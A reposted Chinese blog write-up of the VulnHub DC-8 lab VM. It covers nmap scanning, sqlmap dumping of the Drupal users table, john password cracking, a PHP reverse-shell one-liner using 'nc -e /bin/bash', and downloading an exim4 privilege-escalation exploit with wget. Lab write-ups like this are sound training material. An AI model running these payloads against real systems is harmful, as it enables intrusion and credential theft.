脚本小子学习–vulnhub靶机DC8

@

前言

通过一些靶机实战练习,学习使用现有的工具来成为脚本小子。

一、环境搭建

  1. 靶机:Linux虚拟机 DC8(下载地址https://www.vulnhub.com/entry/dc-8,367/),解压双击用VM虚拟机打开即可。
  2. 用于攻击的主机(本次采用kali)
  3. 确保主机和虚拟机在同一网段下。

二、目标和思路

  1. 绕过两因素身份验证,获得 root 并读取唯一的标志flag文件。
  2. 思路:信息收集->getshell->提权

三、实际操作

1.信息收集

  1. 查看靶机ip
    脚本小子学习--vulnhub靶机DC8
  2. 使用nmap扫描靶机端口,查看哪些端口开放。 nmap 192.168.124.134
    脚本小子学习--vulnhub靶机DC8
    发现存在web服务器,网页访问网站。
    脚本小子学习--vulnhub靶机DC8
    脚本小子学习--vulnhub靶机DC8
#尝试获取数据库名
sqlmap -u http://192.168.124.134/?nid=1 --dbs
#尝试获取表名
sqlmap -u http://192.168.124.134/?nid=1 -D d7db --tables
发现其中含有user表,此表往往是登陆网站,破解的关键数据。
#尝试获取user表内的字段名
sqlmap -u http://192.168.124.134/?nid=1 -D d7db -T users --columns
#对user表内name和pass字段进行数据获取
sqlmap -u http://192.168.124.134/?nid=1 -D d7db -T users -C name,pass --dump

得到账号密码

脚本小子学习--vulnhub靶机DC8
密码明显可以看出是经过加密的,所以我们需要解密。
5. 使用john解密
先将数据存储进一个文件 example.txt中,并且以 用户名:密码的形式进行保存。
#在文件当前目录下使用john解密
john example.txt

脚本小子学习--vulnhub靶机DC8
得到john的密码,admin的密码解密失败。
6. 使用dirb搜寻网站目录,获得登陆入口 dirb http://192.168.124.134,发现目录中存在/user,进入页面输入账号密码登陆成功。
脚本小子学习--vulnhub靶机DC8

2.getshell

  1. 一顿乱点,发现找到了可以编写php代码的位置(点击左上角content->点击edit->点击webforms->点击form settings->点击下拉框选择php code
    脚本小子学习--vulnhub靶机DC8
    脚本小子学习--vulnhub靶机DC8
  2. 输入一句话木马上传反弹shell(此处无法找到路径所以用反弹shell) <?php system("nc -n 192.168.124.134 9999 -e /bin/bash");?>(简单解释:nc是netcat命令,用于两台设别互相交互,-e参数表示当连接成功时在本机开启一个terminal,所有输入会传入到terminal上。)
  3. 保存后,先在kali上启动监听,等待靶机连接 nc -lvp 9999
    脚本小子学习--vulnhub靶机DC8
  4. 查看terminal发现连接成功,为了更方便的使用远程shell,可以尝试写一个python伪terminal来使用 python -c "import pty; pty.spawn('/bin/bash');"
    脚本小子学习--vulnhub靶机DC8
    脚本小子学习--vulnhub靶机DC8
    发现服务器软件exim4。
  5. 使用searchsploit查找相关漏洞。 searchsploit exim4 找到漏洞提权文件 linux/local/46996.sh,打开文件,查看使用命令
#usage instructions
function usage()
{
echo "$0 [-m METHOD]"
echo
echo "-m setuid : use the setuid payload (default)"
echo "-m netcat : use the netcat payload"
echo
exit 1
}

将该文件复制到kali apache服务器上,便于靶机下载(什么服务器都行)。
8. 启动apache服务器 systemctl start apache2,使用之前的反弹shell下载漏洞文件 wget http://192.168.124.130/exim4.sh(exim4.sh是漏洞文件,改了个名字)。权限不足时选择/tmp下载。下载成功后添加执行权限 chmod 777 exim4.sh
9. 注意,直接运行脚本文件如果提示失败,有可能是格式问题,需要在主机上将脚本格式设置成符合unix格式。然后重新上传和下载。

vim exim4.sh
:set ff=unix
:wq

脚本小子学习--vulnhub靶机DC8

总结

本次实验主要还是遵循 信息收集->getshell->提权 的思路,算是一次简单的入门实战练习。在更复杂的环境下还需要考虑更多方面的因素,需要不断实践总结。

Original: https://www.cnblogs.com/allworldg/p/15158444.html
Author: allworldg
Title: 脚本小子学习–vulnhub靶机DC8

原创文章受到原创版权保护。转载请注明出处:https://www.johngo689.com/644187/

转载文章受原作者版权保护。转载请注明原作者出处!

(0)

大家都在看

  • 【软考】易错选择题

    1.第01题:2018下半年系统集成项目管理工程师 工业和信息化部会同国务院有关部门编制的《信息化发展规划》提出了我国未来信息化发展指导思想和基本原则。其中,不包括( )原则。A:…

    技术杂谈 2023年5月31日
    096
  • ffmepg m3u8转mp4 Invalid data found when processing input

    一、ffmepg m3u8转mp4 Invalid data found when processing inp ffmpeg -allowed_extensions ALL -i…

    技术杂谈 2023年6月1日
    089
  • keil使用汇总

    ​ 一:参考博客 参考的教程如下: 首先必须声明的一点是所有的博客都来自于博主strongerHuang,我只是为了记录方便copy下来,如有侵权,请联系删除帖子。链接地址如下:h…

    技术杂谈 2023年6月21日
    0103
  • 设计模式 12 享元模式

    享元模式(Flyweight Pattern)属于 结构型模式 享元,英文名称为 Flyweigh, 轻量级的意思。它通过与其他 类似对象共享数据来减小内存占用,也就是它名字的来由…

    技术杂谈 2023年7月25日
    073
  • RHCSA认证考试

    考试要求: 在 mars.domain250.example.com 上执行以下任务。○ 复查 ○ 完成 配置网络设置○ 复查 ○ 完成 配置您的系统以使用默认存储库○ 复查 ○ …

    技术杂谈 2023年6月21日
    0134
  • Python 周期任务神器,太实用了

    前言 如果你想在Linux服务器上周期性地执行某个 Python 脚本,最出名的选择应该是 Crontab 脚本,但是 Crontab 具有以下缺点: 1.不方便执行秒级的任务。 …

    技术杂谈 2023年6月21日
    0111
  • python 格式化 小数

    python;gutter:true;</p> <blockquote> <blockquote> <blockquote> &lt…

    技术杂谈 2023年7月11日
    079
  • 说说用户线程和守护线程

    什么是用户线程和守护线程? 守护线程是一种特殊的线程,在后台默默地完成一些系统性的服务,比如 垃圾回收线程、 JIT线程都是 守护线程。与之对应的是 用户线程,用户线程可以理解为是…

    技术杂谈 2023年6月21日
    0103
  • wampServer虚拟主机配置

    突然弄服务器,想来想去还是wamp吧。在安装的时候看自己是64位,还是32位,选择安装即可,我在里安装的是在D盘 主要是安装D盘,方便找吧。以下是些技巧,这里就不做笔记,直接截图了…

    技术杂谈 2023年5月31日
    093
  • 基于UML软件建模的高校新闻管理系统

    前言 近年来,伴随着我国国内的网络技术快速发展。高校校园网络建设逐渐迅速发展起来,逐步演变为高校的一个宣传窗口。建立自己的高校新闻发布管理系统已经成为了一种趋势。传统的校园新闻往往…

    技术杂谈 2023年6月21日
    095
  • 2019 第十届蓝桥杯大赛软件类省赛 Java A组 题解

    试题A ​ 题目最后一句贴心的提示选手应该使用 long (C/C++ 应该使用 long long)。 ​ 本题思路很直白,两重循环。外层循环 1 到 2019,内层循环检验是否…

    技术杂谈 2023年7月24日
    083
  • npm install 安装依赖无反应

    1、显示当前使用的镜像: // 把下面这个命令粘贴到 cmd 或终端上执行npm get registry 如果显示当前使用的是默认镜像,那就需要按照淘宝镜像 2、安装淘宝镜像: …

    技术杂谈 2023年5月31日
    0103
  • 彻底搞懂kubernetes调度框架与插件

    404. 抱歉,您访问的资源不存在。 可能是网址有误,或者对应的内容被删除,或者处于私有状态。 代码改变世界,联系邮箱 contact@cnblogs.com 园子的商业化努力-困…

    技术杂谈 2023年7月25日
    086
  • docker

    一.Docker入门 1. Docker 为什么会出现 Docker是基于Go语言开发的!开源项目 4.1. 虚拟化技术的缺点 资源占用十分多 冗余步骤多 启动很慢 2.2. 容器…

    技术杂谈 2023年7月10日
    071
  • 【服务器管理】使用Docker部署的项目修复nginx安全漏洞(CVE-2021-23017)

    本博客主要记录使用Docker部署的前端项目修复nginx 安全漏洞(CVE-2021-23017)的过程。 漏洞报告 根据网上查阅的资料,该漏洞波及的版本为0.6.18-1.20…

    技术杂谈 2023年7月24日
    088
  • STL 总结

    //想不到吧,这个代码真的…

    技术杂谈 2023年6月21日
    0102
亲爱的 Coder【最近整理,可免费获取】👉 最新必读书单  | 👏 面试题下载  | 🌎 免费的AI知识星球